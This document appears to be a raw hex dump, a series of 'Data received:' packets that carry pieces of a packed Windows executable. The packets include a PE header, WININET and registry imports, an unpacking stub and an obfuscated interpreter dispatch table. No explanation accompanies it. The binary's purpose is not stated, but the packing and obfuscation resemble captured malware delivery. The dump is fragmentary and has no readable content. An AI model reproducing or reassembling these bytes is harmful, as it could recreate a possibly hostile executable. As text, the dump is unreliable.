4752 5253 5347 9693 8e11 9e00 743f db4f    GRRSSG......t?.O
d521 c200 1795 9157 2490 dafe 6dfb 989a    .!.....W$...m...
9a88 9205 4b3a 4f4f                        ....K:OO

Data received:

    
4b92 8f8a 520f 00db a07b dcfd 302e 7f32    K...R....{..0..2
2e43 6507 baf4 ecdb 3464 6667 6813 7177    .Ce.....4dfgh.qw
5e74 79bf d751 7a37 78fe 0672 2453 2005    ^ty..Qz7x..r$S .
c888 2aec 9319 0000 b004 0110 0c9e 8b0a    ..*.............
0278 5022 28ff 5f01 4672 6565 4c69 6272    .xP"(._.FreeLibr
6172 79dd be04 d1f4 4d63 4164 6415 7373    ary.....McAdd.ss
c4b7 41be 1c4c 6f61 6441 0d6c 7374 7243    ..A..LoadA.lstrC
c1d8 06d1 4127 53e4 d876 eced 4469 2863    ....A'S..v..Di(c
746f 1e53 6c49 7025 c56e 4e36 702f 6d70    to.SlIp%.nN6p/mp
4578 6958 9307 3bec 5416 6951 6c65 6e25    ExiX..;.T.iQlen%
2b40 fc54 6963 6b43 6fde 43b8 f6ed 8318    +@.TickCo.C.....
4d6f 6475 2548 616e 6405 11c0 da27 41f6    Modu%Hand....'A.
416c 6c50 8af6 f6b7 5b3e 6d65 0e57 6964    AllP....[>me.Wid
6543 68af 546f 4d33 b096 ccfd 7469 4279    eCh.ToM3....tiBy
7414 0a15 1f9b bd20 da14 4654 0c10 6f43    t...... ..FT..oC
41fe 4669 097f edbd 58a1 0bd2 5c09 506f    A.Fi....X...\.Po
69df 5fc0 6e95 6572 8c15 4e61 6d23 550b    i._.n.er..Nam#U.
3bfb f66e 6d61 7093 6577 4f66 414d 0e67    ;..nmap.ewOfAM.g
37f7 da4f 70e0 0916 f36e 67d2 4cb5 610b    7..Op....ng.L.a.
b761 b245 7211 7270 a20b db76 b703 781b    .a.Er.rp...v..x.
5274 6c50 7727 64a2 85f8 edf6 3478 43ec    RtlPw'd.....4xC.
6c4e 1d74 486f 6f6b 1b03 2256 4995 2373    lN.tHook.."VI.#s
1196 3037 3684 680a 1514 1821 a2b5 b664    ..076.h....!...d
a54d b633 f76d 7861 67ad 4622 2641 6190    .M.3.mxag.F"&Aa.
25b4 ef69 9049 de6e 5606 c312 c2b0 1125    %..i.I.nV......%
14b0 852d 7cd2 55b8 4111 0efb f610 11c6    ...-|.U.A.......
44d6 6141 7661 4eb5 16c4 7761 623c 48c5    D.aAvaN...wab<H.
b96f b6b5 ad48 6371 1d98 4111 38d8 76b2    .o...Hcq..A.8.v.
6511 756f 6e05 6323 ffb9 5b6c 4d1a 666f    e.uon.c#..[lM.fo
b200 2509 070b 0779 3272 ec07 2037 0615    ..%....y2r.. 7..
3235 2f38 646b cb03 13a0 0601 0007 edf6    25/8dk..........
b7b7 0d01 0a09 060e 0b06 0509 080a 6def    ..............m.
dc6b 0111 290c 220e 090d 3839 c0fe bb8f    .k..)."...89....
3d2b 306d 3c30 1005                        =+0m<0..

Data received:

    
0918 0e05 1405 0c01 ebba b76d 1603 0b02    ...........m....
0905 0f01 070f 1105 b7ed dfbe 3d15 1615    ............=...
2436 290f 1d17 2b22 0c1c 0903 1c08 73ff    $6)...+"......s.
16fb 0d06 0808 0572 0507 3474 0719 0718    .......r..4t....
0130 bfb5 ff5b 6b06 0c10 1546 a680 171a    .0...[k....F....
1323 4b10 1a06 0d0e ebde fdff 0a24 1010    .#K..........$..
0668 1d19 0626 190a 1b40 a905 321b 29bb    .h...&...@..2.).
08a8 df7e bb7d 0512 0610 3809 0f06 0b28    ...~.}....8....(
0b09 3805 151e 093a 6c73 eddd 124c 0148    ..8....:ls...L.H
0a13 116a 7f01 1006 857d cbf7 141d 0019    ...j.....}......
150e 0a04 9b2d b9ec 1211 050f 01b4 6d6b    .....-........mk
3f98 0912 3b0e 080e 6233 111d dac3 fefd    ?...;...b3......
100d 081f 060f 0415 260b 0f01 0d14 c275    ........&......u
7fad ede2 0d1b bc26 0220 1805 3808 6e9d    .......&. ..8.n.
fbf6 040b 02f0 0f01 0af7 c30e 2c21 6dbb    ............,!m.
6ddb d606 e519 5c4e 052f 640c 4359 3b8b    m.....\N./d.CY;.
dd7d 0c40 1852 0145 0611 adb0 1909 dbd6    .}.@.R.E........
de26 187d 0f08 16da 4d1a 4b0f 67db d963    .&.}....M.K.g..c
021c 1614 000f 0224 0b16 675f f6bb 1804    .......$..g_....
1d11 0f0f 161d 1b18 1911 000c bdec 646f    ..............do
0218 1515 0b1b 1f23 1b18 bff0 85ad 3202    .......#......2.
0feb 1717 1313 7413 2809 212d d636 c361    ......t.(.!-.6.a
8311 f3c1 33de 7bdf 0d3b c212 0b0d 2909    ....3.{..;....).
de0a 2805 2106 0adb b6f1 2b1e 545a 0217    ..(.!.....+.TZ..
0814 610b 7ecd f0ad 154d 4305 0b0d 0711    ..a.~....MC.....
d702 d7fc 77ed 1705 13b8 0023 0e1b 3a52    ....w......#..:R
3424 050e 1e0b 8542 6b7f 4334 1f21 4d23    4$.....Bk.C4.!M#
0d0f fe52 6985 c8db 0bd0 0e2c 1a59 0e22    ...Ri......,.Y."
0521 c68f fd6f e135 1122 2c25 0f20 221e    .!...o.5.",%. ".
0117 4d1d 090a 3e5a a1f0 8e33 2a0c 0a0b    ..M...>Z...3*...
7d3b f6f1 6d8e d627 8e6f 3c18 0612 0931    };..m..'.o<....1
339b 8e07 adcd 35c3 6f6d 0b04 171e 0613    3.....5.om......
1efb 07b7 6d8b 2d0d 210e 9f1d 0a1d 061f    ....m.-.!.......
24a5 73b9 6c11 1e09                        $.s.l...

Data received:

    
2f09 2602 7df3 8d7d 2c21 2006 2f1e 2527    /.&.}..},! ./.%'
230c 166e dab8 d112 0a9e 1c14 810f 5413    #..n..........T.
3287 b385 2f34 c2e7 0404 2926 9c04 0027    2.../4....)&...'
e4ee dd4a 0604 660b 1b07 161d 2a32 5841    ...J..f.....*2XA
4644 83ff 691a 09f0 f900 f026 0d71 2f7f    FD..i......&.q/.
9088 00ff 4c01 0400 b5e8 c000 49c0 e000    ....L.......I...
0e21 0b01 00d7 3d6b b606 0c44 4c00 1330    .!....=k...DL..0
4e04 1009 c196 002f 7260 0000 0b02 0400    N....../r`......
33cc 2de9 6607 0cc0 001e 34dc 9e0d ec10    3.-.f.....4.....
0702 06e0 644f 6e01 ae40 300b 400c a505    ....dOn..@0.@...
2be9 5621 0f68 2409 0757 b860 bb06 0600    +.V!.h$..W.`....
2edd 7407 9e43 90c4 00e6 c2be eb04 4520    ..t..C........E 
2e00 72dd 2037 5774 fb4e 0006 0827 48b7    ..r. 7Wt.N...'H.
5877 2100 4002 2e26 2784 3936 0025 8334    Xw!.@..&'.96.%.4
7050 c04f e900 9ecd c465 251f 30b0 0027    pP.O.....e%.0..'
0ab7 fba6 a458 4204 1bcc 50bc b23a 9281    .....XB...P..:..
7707 674b 0106 99e0 7709 807c 2408 0901    w.gK....w..|$...
0f85 b9ca 9500 e62b 3409 0010 8dbe 0060    .......+4......`
ffff 5720 eb10 3f52 308a 0646 8807 0047    ..W ..?R0..F...G
01db 7507 8b1e 8303 eefc 11db 72ed 735a    ..u.........r.sZ
2044 0810 011c b03d f75e 9700 8843 73e4     D.....=.^...Cs.
31c9 83e8 0330 720d de87 400f 83f0 ff74    1....0r...@....t
1474 89c5 bc99 0ca3 7520 6041 701c 033a    .t......u `Ap..:
182c 10d8 0f00 30ff ff3f 181d d008 40f1    .,....0..?....@.
32d8 cf6f f7a0 0822 2014 1590 5477 9f2e    2..o..." ...Tw..
09b0 0500 00b9 2830 288c 4190 78e0 9b05    ......(0(.A.x...
1a25 7017 1f10 f48c 255e 89f7 b94e a901    .%p.....%^...N..
008a 0747 2ce8 3c01 7700 f780 3f01 75f2    ...G,.<.w...?.u.
8b07 008a 5f04 66c1 e808 c100 c010 86c4    ...._.f.........
29f8 80eb 10e8 01f0 ec51 8088 2d0e 961d    )........Q..-...
2fe0 7409 8b07 09c0 7401 3c8b 5f04 8d84    /.t.....t.<._...
3092 9e01 1030 0f35 788c f06f 0905 c502    0....0.5x..o....
9539 0008 c074 dc00 89f9 5748 f2ae 55ff    .9...t....WH..U.
3096 5450 800b 0789                        0.TP....

Data received:

    
0383 00c3 04eb e161 31c0 c220 0c00 2901    .......a1.. ..).
8d5e fc31 c0c0 b0c0 0622 3cef 7711 0106    .^.1....."<.w...
c38b 0386 c4d5 20c1 0003 00eb e224 0fc1    ...... ......$..
e010 6640 8be9 0002 ebe2 8bae 58c3 1d00    ..f@........X...
f900 f0ff ffbb ce98 7192 0411 3075 f55f    ........q...0u._
dd78 f8de 2010 0008 f207 0886 f237 9204    .x.. ........7..
0108 1558 618d 4424 806a 0000 39c4 75fa    ...Xa.D$.j..9.u.
83ec 801a e967 75aa 9e05 f0ff 2c00 789e    .....gu.....,.x.
9e00 55ed 333a 0056 c803 684c 0cc9 036a    ..U.3:.V..hL...j
704c 0c50 9c5c a0ca 00ba aa0c a0cc 00d8    pL.P.\..........
9c64 ce41 f4d8 1cf4 a805 4624 9d05 1f55    .d.A......F$...U
8057 494e 0f49 4e45 542c 6262 0a6f 5790    .WIN.INET,bb.oW.
e357 d0e7 1b52 d03c 65ff 006f 6334 e620    .W...R.<e..oc4. 
1125 00e4 775b 1072 eb13 0200 90b4 ae05    .%..w[.r........
e156 d641 f704 b7a2 0501 10be a725 e761    .V.A.........%.a
0aaa 7d1e 070c c4c2 0348 0c40 a6c9 0000    ..}......H.@....
46ce aae0 870a e02c 70af ca00 192e a650    F......,p......P
c300 590c b0a7 ca03 860c e0c8 0095 0cb0    ..Y.............
daca 00bb 0c30 cd00 dea7 1160 c90a 0104    .....0.....`....
0005 0006 0050 c502 d879 22ba 2333 26b4    .....P...y".#3&.
0a56 ed9d e496 1640 9716 c696 a657 c678    .V.....@.....W.x
4072 375d 104f 7574 7075 7409 466f 726d    @r7].Output.Form
52ef 50e5 c6f9 0400 6674 7357 6f72 6442    R.P.....ftsWordB
a79e 29b0 1609 28e7 120c 8895 15f0 04ff    ..)...(.........
8459 0ecd 9615 f106 8c59 142a fe3a 0eab    .Y.......Y.*.:..
f1d3 7063 01ff ff01 0e74 2062 6520 7275    ..pc.....t be ru
6e20 696e 2044 4f53 206d 6f64 652e 0d0d    n in DOS mode...
0a24 0000 0000 0000 00e5 4694 d8a1 27fa    .$........F...'.
8ba1 27fa 8ba1 27fa 8b22 3bf4 8ba5 27fa    ..'...'..";...'.
8ba1 27fa 8baa 27fa 8bc3 38e9 8ba4 27fa    ..'...'...8...'.
8ba1 27fb 8b83 27fa 8b49 38f1 8ba2 27fa    ..'...'..I8...'.
8b49 38fe 8ba0 27fa 8b52 6963 68a1 27fa    .I8...'..Rich.'.
8b00 0000 0000 0000 0050 4500 004c 0103    .........PE..L..
00b5 e8c5 d9ff ff00                        ........

Data received:

    
0000 0000 00e0 000e 210b 0106 0000 3000    ........!.....0.
0000 1000 0000 a000 0000 d700 0000 b000    ................
0000 e000 0000 0000 1000 1000 0000 0200    ................
0004 0000 0000 0000 0004 0000 0000 0000    ................
0000 f000 0000 1000 0000 0000 0002 0000    ................
0000 0010 0000 1000 0000 0010 0000 1000    ................
0000 0000 0010 0000 0004 e100 0070 0100    .............p..
0000 e000 0004 0100 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0074 e200 000c 0000 0000 0000 0000 0000    .t..............
0000 0000 0000 0000 0000 0000 0000 0000    ................
0050 8000 0000 0000 0000 0000 009c 8000    .P..............
0050 8000 005c 8000 0000 0000 0000 0000    .P...\..........
00a9 8000 005c 8000 0064 8000 0000 0000    .....\...d......
0000 0000 00c2 8000 0064 8000 0000 0000    .........d......
0000 0000 0000 0000 0000 0000 0000 0000    ................
0078 8000 008b 8000 0000 0000 00b4 8000    .x..............
0000 0000 00cf 8000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0047 6574 4d6f    ...........GetMo
6475 6c65 4861 6e64 6c65 4100 0000 4765    duleHandleA...Ge
7450 726f 6341 6464 7265 7373 004b 4552    tProcAddress.KER
4e45 4c33 322e 444c 4c00 5553 4552 3332    NEL32.DLL.USER32
2e64 6c6c 0000 0047 6574 4d65 7373 6167    .dll...GetMessag
6541 0041 4456 4150 4933 322e 646c 6c00    eA.ADVAPI32.dll.
0000 5265 6743 6c6f 7365 4b65 7900 60e8    ..RegCloseKey.`.
0000 0000 582d 62fd ffff 8b30 03f0 2bc0    ....X-b....0..+.
8bfe 66ad c1e0 0c8b c850 ad2b c803 f18b    ..f......P.+....
c857 5149 8a44 3906 7405 8804 31eb f488    .WQI.D9.t...1...
0431 8bd6 8bcf e856 0000 005e 5a83 ea05    .1.....V...^Z...
2bc9 3bca 7326 8bd9 ac41 24fe 3ce8 75f2    +.;.s&...A$.<.u.
4383 c104 ad0b c078 063b c273 e5eb 0603    C......x.;.s....
c378 df03 c22b c389 46fc ebd6 e800 0000    .x...+..F.......
005f 81c7 8dff ffff b0e9 aab8 9a02 0000    ._..............
abe8 0000 0000 5805                        ......X.

Data received:

    
1c02 0000 e90c 0200 0055 8bec 83ec 148a    .........U......
0256 33f6 4639 7508 894d f088 0189 75f8    .V3.F9u..M....u.
c645 ff00 0f86 e301 0000 5357 807d ff00    .E........SW.}..
8a0c 3274 0c8a 4432 01c0 e904 c0e0 040a    ..2t..D2........
c846 8365 f400 884d fe0f b645 ff8b 7d08    .F.e...M...E..}.
2bf8 3bf7 0f83 a001 0000 84c9 0f89 1701    +.;.............
0000 807d ff00 8b1c 3274 03c1 eb04 81e3    ...}....2t......
ffff 0f00 4681 7df8 8108 0000 8bfb 7320    ....F.}.......s 
d1ef f6c3 0174 1481 e7ff 0700 0003 f081    .....t..........
c781 0000 0080 75ff 01eb 4b83 e77f eb45    ......u...K....E
83e3 03c1 ef02 83eb 0074 374b 7427 4b74    .........t7Kt'Kt
154b 7532 81e7 ffff 0300 8d74 3001 81c7    .Ku2.......t0...
4144 0000 ebcf 81e7 ff3f 0000 81c7 4104    AD.......?....A.
0000 46eb 1181 e7ff 0300 0003 f083 c741    ..F............A
ebb3 83e7 3f47 807d ff00 7409 0fb7 1c32    ....?G.}..t....2
c1eb 04eb 0c33 db66 8b1c 3281 e3ff 0f00    .....3.f..2.....
000f b645 ff80 75ff 0103 f08b c383 e00f    ...E..u.........
83f8 0f74 058d 5803 eb38 4681 fbff 0f00    ...t..X..8F.....
0074 08c1 eb04 83c3 12eb 2780 7dff 0074    .t........'.}..t
0d8b 0432 c1e8 0425 ffff 0000 eb04 0fb7    ...2...%........
0432 468d 9811 0100 0046 81fb 1001 0100    .2F......F......
745f 8b45 f82b c785 db74 428b 7df0 03c7    t_.E.+...tB.}...
895d ec8b 5df8 8a08 ff45 f840 ff4d ec88    .]..]....E.@.M..
0c1f 75ef 8a4d feeb 2480 7dff 000f b61c    ..u..M..$.}.....
3274 0d0f b644 3201 c1eb 04c1 e004 0bd8    2t...D2.........
8b7d f88b 45f0 ff45 f888 1c38 46ff 45f4    .}..E..E...8F.E.
d0e1 837d f408 884d fe0f 8c9a feff ffeb    ...}...M........
4933 c038 45ff 7413 8a44 32fc c645 ff00    I3.8E.t..D2..E..
25fc 0000 00c1 e005 46eb 0c66 8b44 32fb    %.......F..f.D2.
25c0 0f00 00d1 e083 e17f 03c8 8d44 0908    %............D..
85c0 7416 8b0c 328b 5df8 8b7d f083 45f8    ..t...2.]..}..E.
0483 c604 4889 0c1f 75ea 0fb6 45ff 8b4d    ....H...u...E..M
082b c83b f10f 8221 feff ff5f 5b8b 45f8    .+.;...!..._[.E.
5ec9 c204 00e9 9f24                        ^......$

Data received:

    
0000 7f8c ffff 0000 0000 4d73 0000 0000    ..........Ms....
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0001 0000    ................
0018 0000 8024 0000 8004 004d 0059 004d    .....$.....M.Y.M
0053 0000 0000 0000 0000 0000 0000 0000    .S..............
0000 0001 006b 0000 003c 0000 8000 0000    .....k...<......
0000 0000 0000 0000 0000 0001 0004 0800    ................
0054 0000 0070 4000 0000 3200 0000 0000    .T...p@...2.....
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000                        ........

Data received:

    
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0089 e883 ed02 6689    ..............f.
4500 e9e3 0600 0066 0fb7 1683 eefe 9298    E......f........
83ed 0489 4500 e9cf 0600 008b 0683 ed04    ....E...........
8945 0083 c604 e9bf 0600 008b 4500 8b55    .E..........E..U
048a 4d08 83c5 020f a5d0 8945 049c 8f45    ..M........E...E
00e9 bc01 0000 8a06 8d76 018a 0407 83ed    .........v......
0266 8945 00e9 9006 0000 660f b716 83ed    .f.E......f.....
0283 eefe 6689 5500 e97d 0600 008b 5d00    ....f.U..}....].
668b 4d04 83c5 0666 3689 0be9 8201 0000    f.M....f6.......
8b5d 0066 8b03 83c5 0266 8945 00e9 7001    .].f.....f.E..p.
0000 668b 5500 8a4d 0283 ed02 d2ea 6689    ..f.U..M......f.
5504 9c8f 4500 e93f 0600 0066 8b45 0066    U...E..?...f.E.f
8b4d 0283 ed02 f6d0 f6d1 20c8 6689 4504    .M........ .f.E.
9c8f 4500 e921 0600 008b 4500 8a4d 0483    ..E..!....E..M..
ed02 d3e8 8945 049c 8f45 00e9 0a06 0000    .....E...E......
89e8 83ed 0489 4500 e9fd 0500 008a 0666    ......E........f
8b55 0083 c502 4666 8914 07e9 0201 0000    .U....Ff........
668b 5500 8a4d 0283 ed02 66d3 e266 8955    f.U..M....f..f.U
049c 8f45 00e9 d005 0000 8a06 668b 0407    ...E........f...
4683 ed02 6689 4500 e9bd 0500 00f7 5500    F...f.E.......U.
668b 4d00 83ed 0266 214d 049c 8f45 00e9    f.M....f!M...E..
a605 0000 8b5d 0001 5d04 9c8f 4500 e9af    .....]..]...E...
0000 008b 4d00 8b5d 0483 c508 3689 19e9    ....M..]....6...
9e00 0000 668b 5500 8a4d 0283 ed02 66d3    ....f.U..M....f.
ea66 8955 049c 8f45 00e9 6c05 0000 0fb6    .f.U...E..l.....
0683 eeff 668b 5500 83c5 0288 1407 e96f    ....f.U........o
0000 008b 6d00 e94f 0500 0066 0fb6 5500    ....m..O...f..U.
83ed 0200 5504 9c8f                        ....U...

Data received:

    
4500 e93b 0500 0066 8b6d 00e9 3205 0000    E..;...f.m..2...
8b5d 008a 4d04 83ed 02d3 e389 5d04 9c8f    .]..M.......]...
4500 e91b 0500 008b 5d00 668b 5504 83c5    E.......].f.U...
0636 8813 e921 0000 009c 5355 5752 5652    .6...!....SUWRVR
5150 6800 0000 008b 7424 2c89 e581 ecc0    QPh.....t$,.....
0000 0089 e789 f303 7500 8a0e 0fb6 c183    ........u.......
c601 8d14 8541 a240 00ff 228b 4500 368b    .....A.@..".E.6.
1089 5500 e9e1 ffff ff66 8b55 008a 4d02    ..U......f.U..M.
83ed 02d2 e266 8955 049c 8f45 00e9 b004    .....f.U...E....
0000 e0a6 4000 74a0 4000 a1a6 4000 b2a6    ....@.t.@...@...
4000 e0a6 4000 61a0 4000 a1a6 4000 bfa1    @...@.a.@...@...
4000 e0a6 4000 b6a1 4000 a1a6 4000 94a6    @...@...@...@...
4000 e0a6 4000 f4a0 4000 a1a6 4000 b6a1    @...@...@...@...
4000 e0a6 4000 7fa7 4000 a1a6 4000 4da0    @...@...@...@.M.
4000 e0a6 4000 61a0 4000 a1a6 4000 6ba1    @...@.a.@...@.k.
4000 e0a6 4000 0ea0 4000 a1a6 4000 0ea0    @...@...@...@...
4000 e0a6 4000 87a0 4000 a1a6 4000 1ea7    @...@...@...@...
4000 e0a6 4000 41a6 4000 a1a6 4000 72a7    @...@.A.@...@.r.
4000 e0a6 4000 70a6 4000 a1a6 4000 bfa1    @...@.p.@...@...
4000 e0a6 4000 d6a1 4000 a1a6 4000 22a0    @...@...@...@.".
4000 e0a6 4000 9aa1 4000 a1a6 4000 61a0    @...@...@...@.a.
4000 e0a6 4000 87a0 4000 a1a6 4000 e7a0    @...@...@...@...
4000 e0a6 4000 a2a1 4000 a1a6 4000 60a7    @...@...@...@.`.
4000 e0a6 4000 99a0 4000 a1a6 4000 4ca6    @...@...@...@.L.
4000 e0a6 4000 f4a0 4000 a1a6 4000 41a6    @...@...@...@.A.
4000 e7a0 4000 b2a0 4000 81a6 4000 34a1    @...@...@...@.4.
4000 b2a6 4000 b6a1 4000 9aa1 4000 4ba1    @...@...@...@.K.
4000 00a0 4000 e7a0 4000 1ea7 4000 b2a0    @...@...@...@...
4000 c5a6 4000 32a0 4000 34a1 4000 d6a1    @...@.2.@.4.@...
4000 32a7 4000 6ba1 4000 87a0 4000 a2a1    @.2.@.k.@...@...
4000 28a2 4000 9aa1 4000 7fa7 4000 61a0    @.(.@...@...@.a.
4000 32a7 4000 85a1 4000 5aa1 4000 1aa2    @.2.@...@.Z.@...
4000 4ca6 4000 9aa1 4000 a2a1 4000 99a0    @.L.@...@...@...
4000 32a0 4000 00a0                        @.2.@...

Data received:

    
4000 32a0 4000 99a0 4000 32a7 4000 7fa7    @.2.@...@.2.@...
4000 22a0 4000 4da0 4000 d6a1 4000 d6a1    @.".@.M.@...@...
4000 48a7 4000 28a2 4000 07a1 4000 b2a0    @.H.@.(.@...@...
4000 4ba1 4000 9aa1 4000 32a0 4000 1aa2    @.K.@...@.2.@...
4000 85a1 4000 81a6 4000 4da0 4000 32a0    @...@...@.M.@.2.
4000 d0a0 4000 60a7 4000 b2a0 4000 7fa7    @...@.`.@...@...
4000 81a6 4000 60a7 4000 99a0 4000 32a0    @...@.`.@...@.2.
4000 60a7 4000 00a0 4000 72a7 4000 21a1    @.`.@...@.r.@.!.
4000 c5a6 4000 1ea7 4000 60a6 4000 21a1    @...@...@.`.@.!.
4000 32a0 4000 7fa7 4000 21a1 4000 61a0    @.2.@...@.!.@.a.
4000 6ba1 4000 60a6 4000 f4a0 4000 6ba1    @.k.@.`.@...@.k.
4000 d6a1 4000 b6a1 4000 7fa7 4000 22a0    @...@...@...@.".
4000 22a0 4000 0ea0 4000 4ba1 4000 b2a6    @.".@...@.K.@...
4000 32a0 4000 d0a0 4000 70a6 4000 1aa2    @.2.@...@.p.@...
4000 9aa1 4000 07a1 4000 a2a1 4000 6ba1    @...@...@...@.k.
4000 7fa7 4000 81a6 4000 99a0 4000 32a7    @...@...@...@.2.
4000 7fa7 4000 0ea0 4000 72a7 4000 34a1    @...@...@.r.@.4.
4000 b6a1 4000 07a1 4000 74a0 4000 e7a0    @...@...@.t.@...
4000 d0a0 4000 4ca6 4000 22a0 4000 b2a0    @...@.L.@.".@...
4000 b2a6 4000 00a0 4000 00a0 4000 b6a1    @...@...@...@...
4000 d6a1 4000 87a0 4000 b2a0 4000 9aa1    @...@...@...@...
4000 60a6 4000 60a6 4000 b6a1 4000 e7a0    @.`.@.`.@...@...
4000 94a6 4000 48a7 4000 9aa1 4000 22a0    @...@.H.@...@.".
4000 32a0 4000 60a6 4000 21a1 4000 9aa1    @.2.@.`.@.!.@...
4000 32a7 4000 d6a1 4000 32a0 4000 9aa1    @.2.@...@.2.@...
4000 b6a1 4000 21a1 4000 72a7 4000 4da0    @...@.!.@.r.@.M.
4000 1aa2 4000 87a0 4000 21a1 4000 60a7    @...@...@.!.@.`.
4000 4ba1 4000 32a7 4000 d6a1 4000 74a0    @.K.@.2.@...@.t.
4000 99a0 4000 00a0 4000 b6a1 4000 32a0    @...@...@...@.2.
4000 c5a6 4000 b2a6 4000 48a7 4000 00a0    @...@...@.H.@...
4000 7fa7 4000 5aa1 4000 32a7 4000 94a6    @...@.Z.@.2.@...
4000 4ca6 4000 f4a0 4000 81a6 4000 28a2    @.L.@...@...@.(.
4000 b6a1 4000 07a1 4000 32a0 4000 41a6    @...@...@.2.@.A.
4000 61a0 4000 85a1                        @.a.@...

Data received:

    
4000 48a7 4000 1aa2 4000 22a0 4000 72a7    @.H.@...@.".@.r.
4000 0ea0 4000 bfa1 4000 4da0 4000 e7a0    @...@...@.M.@...
4000 07a1 4000 1ea7 4000 21a1 4000 70a6    @...@...@.!.@.p.
4000 d0a0 4000 21a1 4000 60a7 4000 b6a1    @...@.!.@.`.@...
4000 22a0 4000 bfa1 4000 94a6 4000 60a7    @.".@...@...@.`.
4000 d6a1 4000 4ba1 4000 81a6 4000 4ba1    @...@.K.@...@.K.
4000 8b75 0083 c504 e9b8 fbff ff8b 5d00    @..u..........].
6636 0fb6 1383 c502 6689 5500 e9a9 fbff    f6......f.U.....
ff8b 4500 8b55 0483 c508 8910 e999 fbff    ..E..U..........
ff8a 0683 ed02 6689 4500 83ee ffe9 7000    ......f.E.....p.
0000 8b45 0028 f68a 1083 c502 6689 5500    ...E.(......f.U.
e975 fbff ff89 ec5a 5859 5f5e 5a5f 5d5b    .u.....ZXY_^Z_][
9dc3 80e0 3c8b 1407 83ed 0489 5500 e93f    ....<.......U..?
0000 008b 5500 6636 8b0a 83c5 0266 894d    ....U.f6.....f.M
00e9 44fb ffff 8b45 008b 5504 8a4d 0883    ..D....E..U..M..
c502 0fad d089 4504 9c8f 4500 e929 fbff    ......E...E..)..
ff80 e03c 8b4d 0083 c504 890c 07e9 18fb    ...<.M..........
ffff 8d47 5039 c50f 870d fbff ff8d 4f40    ...GP9........O@
29e1 8d45 8029 c889 c49c 5689 fe8d bd40    )..E.)....V....@
ffff ff57 fcf3 a45f 5e9d e9eb faff ff66    ...W..._^......f
8b45 0083 ed02 6601 4504 9c8f 4500 e9bf    .E....f.E...E...
ffff ff66 0fb6 1e93 6698 9883 c601 83ed    ...f....f.......
0489 4500 e9a9 ffff ff8b 4500 8b5d 04f7    ..E.......E..]..
d0f7 d321 d889 4504 9c8f 4500 e9a9 faff    ...!..E...E.....
ff8b 5500 668b 4d04 83c5 0666 890a e997    ..U.f.M....f....
faff ff8b 4d00 8b01 8945 00e9 8afa ffff    ....M....E......
8b55 0066 8b4d 0483 c506 880a e979 faff    .U.f.M.......y..
ff68 9aa7 4000 e84e faff ff38 200c 1c3c    .h..@..N...8 ..<
0810 0418 302c 0024 58ff 4700 33e9 d834    ....0,.$X.G.3..4
5001 6e00 405b 0040 99e8 282b be0c ad51    P.n.@[.@..(+...Q
6a24 2b41 f352 ae02 bb24 6a24 9105 6ce4    j$+A.R...$j$..l.
2dff 2c24 2508 8126 8126 0700 2508 8124    -.,$%..&.&..%..$
8124 0728 0d2c 6408 3347 2c03 1434 1658    .$.(.,d.3G,..4.X
ff47 2800 2216 321a                        .G(.".2.

Data received:

    
0612 0a3e 1e0e 223a 0221 3c28 3018 1000    ...>..":.!<(0...
2c34 0c14 0808 2bc6 1540 003e 4738 160e    ,4....+..@.>G8..
362e 0212 1a32 2a3e 0b68 47df 6e85 e866    6....2*>.hG.n..f
ffff ff00 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
0000 0000 0000 0000 0000 0000 0000 0000    ................
